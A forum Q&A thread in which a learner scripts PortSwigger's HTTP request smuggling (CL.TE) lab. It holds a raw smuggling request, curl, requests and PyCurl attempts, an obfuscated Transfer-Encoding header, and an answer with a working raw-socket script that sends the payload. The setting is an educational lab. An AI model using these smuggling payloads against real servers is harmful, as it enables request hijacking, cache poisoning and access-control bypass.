# Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Tags: python, curl

Lately I have been attempting Portswiggers WebSecAcademy's HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

```
POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 8
Transfer-Encoding: chunked

0

G
```

If you right click and select 'Copy as curl command':

```
curl -i -s -k -X $'POST' \
    -H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' \
    --data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \
    $'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
```

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

```
def POST_CLTE():
    url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
    headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}

    data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'

    s = requests.Session()
    r = requests.Request('POST', url, headers=headers, data=data)
    prepared = r.prepare()
    response = s.send(prepared)

    print(response.request.headers)
    print(response.status_code)
    print(response.text)
```

But I don't like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

```
X: X[\n]Transfer-Encoding: chunked
```

I've attempted to reproduce the request using PyCurl:

```
#!/usr/bin/python

import pycurl
from StringIO import StringIO

buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
c.setopt(c.HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
    'Content-Length: 8',
    'Transfer-Encoding: chunked',
    'Content-Type: application/x-www-form-urlencoded'
    ])
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)
c.setopt(c.HEADER, 1)
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()

body = buffer.getvalue()

print(body)
```

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

```
*   Trying 18.200.141.238:443...                                                                                                                            
* TCP_NODELAY set                                                                                                                                           
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                     
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification OK
*        server certificate status verification SKIPPED
*        common name: web-security-academy.net (matched)
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=web-security-academy.net
*        start date: Fri, 05 Jul 2019 00:00:00 GMT
*        expire date: Wed, 05 Aug 2020 12:00:00 GMT
*        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
< 
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23

"Internal Server Error"
```

What is the reason for this behaviour? Are there any alternatives I haven't explored? Any suggestions are much appreciated.

Comment: Your requests explicitly include `Content-length: 8` yet you claim that the intended solution uses `Content-length: 10`. So which one is correct? Also, you seem to stumble over programming problems and not actual security problems. It is perfectly fine that the tools you are use try to enforce correct headers etc. Use plain TCP sockets if you want to do something which is not correct HTTP. But again, this is more a programming problem and thus off-topic.

Comment: It is 8, I forgot to opt out of Burp automatically updating Content-Length for this request. Now edited. I will look into the plain TCP sockets as you have suggested, thanks for the advice.

Answer (score 0):

Socket module worked perfectly for me. Feel a bit silly for not trying it to start but I learned a great deal.

Code:

```
import socket
import ssl

host = 'lab-id.web-security-academy.net'
port = 443
message = "POST / HTTP/1.1\r\n"
hostHeader = "Host: lab-id.web-security-academy.net\r\n"
contentLength = "Content-Length: 8\r\n"
transferEncoding = "Transfer-Encoding: chunked\r\n"
contentType = "Content-Type: application/x-www-urlencoded\r\n"
requestBody = "0\r\n\r\nG\r\n"

finalMessage = message + hostHeader + contentLength + transferEncoding + contentType + "\r\n" + requestBody

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sslWrappedSock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS)

sslWrappedSock.connect((host, port))
sslWrappedSock.sendall(finalMessage)

print(sslWrappedSock.recv(1024))

sslWrappedSock.close()
```

Comment: Yes, a comment for future readers, do not try to send bad HTTP with good HTTP clients, they will try to fix it. To send really bad protocols messages you have to use low-level tools, like sockets, and not http clients.